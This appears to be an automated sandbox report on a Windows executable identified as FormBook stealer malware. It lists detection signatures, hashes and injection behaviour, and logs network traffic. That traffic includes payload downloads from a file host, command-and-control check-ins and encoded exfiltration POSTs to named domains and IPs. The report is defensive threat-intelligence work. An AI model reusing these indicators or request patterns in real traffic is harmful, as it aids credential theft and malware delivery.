Windows Analysis Report
SC_0017384.exe

Overview

General Information

Sample Name: SC_0017384.exe
Analysis ID: 831200
MD5: f296a60e1568722b060de70b46357fe6
SHA1: e24c65bd02d435c6b5705e9a01442e0447b77e22
SHA256: 661f40c3448fa2acbddfd8297c54733b9f2d9c71e15506a4fba876a25d279e76
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Encrypted powershell cmdline option found
Machine Learning detection for sample
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: SC_0017384.exe ReversingLabs: Detection: 12%
Source: SC_0017384.exe Virustotal: Detection: 17% Perma Link
Yara detected FormBook
Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe ReversingLabs: Detection: 12%
Machine Learning detection for sample
Source: SC_0017384.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.SC_0017384.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
Source: SC_0017384.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: SC_0017384.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: SC_0017384.exe, SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 54.85.86.211 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.myprojoints.com
Source: C:\Windows\explorer.exe Network Connect: 172.67.152.24 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 74.208.236.131 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.229 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.metatv.app
Source: C:\Windows\explorer.exe Domain query: www.findmyoriginstory.com
Source: C:\Windows\explorer.exe Domain query: www.brunaeleandro.com
Source: C:\Windows\explorer.exe Domain query: www.madisoncountylincoln.com
Source: C:\Windows\explorer.exe Network Connect: 172.67.194.225 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.emprendizajesocial.com
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 74.208.236.131:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 74.208.236.131:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 74.208.236.131:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 172.67.194.225:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 172.67.194.225:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 172.67.194.225:80
Yara detected Generic Downloader
Source: Yara match File source: 0.2.SC_0017384.exe.6980000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SC_0017384.exe.486b570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw== HTTP/1.1Host: www.findmyoriginstory.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g== HTTP/1.1Host: www.emprendizajesocial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG45 HTTP/1.1Host: www.brunaeleandro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA== HTTP/1.1Host: www.madisoncountylincoln.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG45 HTTP/1.1Host: www.metatv.appConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 54.85.86.211 54.85.86.211
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.emprendizajesocial.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.emprendizajesocial.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.emprendizajesocial.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 74 53 67 53 46 6d 4e 55 59 35 38 65 4d 74 73 57 28 58 79 41 56 6c 64 6e 39 42 43 72 31 71 54 51 4f 42 64 6a 6d 49 44 54 4d 68 32 50 45 5a 4c 71 36 69 4d 32 64 4a 77 4c 36 38 32 47 5a 43 64 78 48 68 48 46 55 56 5a 5a 58 4e 70 61 59 45 52 61 28 74 4a 48 54 42 48 4e 59 5a 4b 68 56 73 68 45 79 6f 4d 30 5a 48 4a 59 56 54 6e 61 46 7a 4f 55 38 65 57 49 46 48 4a 63 6b 32 41 63 71 31 6e 62 6f 6c 33 44 77 6a 56 36 50 5a 46 42 33 5a 69 37 34 42 42 65 68 63 6e 44 7e 4b 41 56 6f 69 37 75 55 48 48 44 47 6d 62 76 41 4c 63 4a 36 45 64 55 4a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=tSgSFmNUY58eMtsW(XyAVldn9BCr1qTQOBdjmIDTMh2PEZLq6iM2dJwL682GZCdxHhHFUVZZXNpaYERa(tJHTBHNYZKhVshEyoM0ZHJYVTnaFzOU8eWIFHJck2Acq1nbol3DwjV6PZFB3Zi74BBehcnD~KAVoi7uUHHDGmbvALcJ6EdUJQ).
Source: global traffic HTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.brunaeleandro.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.brunaeleandro.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brunaeleandro.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 65 50 49 69 41 6e 77 2d 54 66 4f 72 6f 48 65 71 66 5f 35 72 68 4b 6c 74 30 78 4b 32 4c 4d 79 66 4f 56 4e 53 32 75 66 5a 77 73 78 37 43 32 42 35 49 76 34 33 57 6f 6d 51 58 76 7e 58 67 71 37 4a 70 4d 49 68 52 79 53 6e 36 36 36 67 66 51 54 47 4f 38 6e 6b 33 68 39 4b 30 30 58 59 44 5f 42 34 68 36 4e 38 4f 6f 6a 5a 4c 4f 35 69 53 36 63 51 48 36 74 6c 4b 63 77 74 59 46 78 55 56 61 51 75 69 51 46 6e 59 48 69 75 65 6d 55 63 72 53 4d 37 47 51 6b 6a 30 50 46 70 6c 39 36 47 6f 52 45 7a 35 33 39 39 4e 38 58 70 6e 43 54 63 66 74 6d 51 73 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=ePIiAnw-TfOroHeqf_5rhKlt0xK2LMyfOVNS2ufZwsx7C2B5Iv43WomQXv~Xgq7JpMIhRySn666gfQTGO8nk3h9K00XYD_B4h6N8OojZLO5iS6cQH6tlKcwtYFxUVaQuiQFnYHiuemUcrSM7GQkj0PFpl96GoREz5399N8XpnCTcftmQsw).
Source: global traffic HTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.madisoncountylincoln.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.madisoncountylincoln.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.madisoncountylincoln.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 57 35 41 4e 77 46 37 41 6f 31 54 79 6c 39 48 44 32 33 6e 46 6f 72 65 6d 49 65 45 44 6d 4b 74 4b 49 6e 49 49 31 5a 5a 67 41 30 4a 48 52 41 69 31 4f 6d 58 56 35 31 7a 52 32 68 76 4b 33 6a 38 71 68 44 63 6f 72 45 6d 4e 78 52 67 32 44 36 6d 4b 58 75 33 48 5a 56 51 57 47 33 32 71 58 63 4a 6b 78 4d 69 49 31 57 65 37 33 41 75 6f 75 73 6d 4d 71 46 6c 57 6a 75 75 48 49 4d 56 68 64 6e 64 67 6e 48 4d 78 47 5f 56 47 57 48 6b 69 7a 4b 34 5a 34 62 42 7a 52 37 7a 52 61 75 6e 30 48 33 54 44 76 43 6c 52 7e 57 38 30 37 57 59 68 46 63 44 73 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=W5ANwF7Ao1Tyl9HD23nForemIeEDmKtKInII1ZZgA0JHRAi1OmXV51zR2hvK3j8qhDcorEmNxRg2D6mKXu3HZVQWG32qXcJkxMiI1We73AuousmMqFlWjuuHIMVhdndgnHMxG_VGWHkizK4Z4bBzR7zRaun0H3TDvClR~W807WYhFcDsng).
Source: global traffic HTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.metatv.appConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.metatv.appUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.metatv.app/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 28 50 51 4d 33 59 50 4d 61 32 7a 2d 50 59 50 33 34 70 4a 4b 37 70 6e 6c 7a 78 6a 79 6f 72 31 46 7a 36 62 64 51 56 58 45 28 6d 58 48 74 57 39 6b 52 4c 41 55 6e 46 76 4e 5a 77 38 63 55 4a 34 45 30 73 52 7a 72 4a 4e 62 58 39 5a 4b 51 48 44 7a 5a 54 77 72 79 57 49 55 70 58 42 64 50 32 31 55 44 35 68 62 53 63 68 7a 28 55 49 77 77 70 6e 73 4f 4d 76 7a 36 6b 67 67 63 59 6e 6e 4b 33 35 31 6f 53 54 54 53 6e 44 58 48 56 63 4f 51 56 43 4a 39 39 69 75 58 65 6e 30 6a 48 43 59 65 59 69 68 49 47 6f 41 79 64 48 71 38 57 4b 33 53 4f 38 36 74 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=(PQM3YPMa2z-PYP34pJK7pnlzxjyor1Fz6bdQVXE(mXHtW9kRLAUnFvNZw8cUJ4E0sRzrJNbX9ZKQHDzZTwryWIUpXBdP21UD5hbSchz(UIwwpnsOMvz6kggcYnnK351oSTTSnDXHVcOQVCJ99iuXen0jHCYeYihIGoAydHq8WK3SO86tQ).
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Tue, 21 Mar 2023 08:11:27 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Mar 2023 08:11:38 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 596Connection: closeDate: Tue, 21 Mar 2023 08:11:42 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 52 52 4f 52 20 34 30 34 3a 20 41 52 43 48 49 56 4f 20 4e 4f 20 45 4e 43 4f 4e 54 52 41 44 4f 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 68 61 20 73 69 64 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>
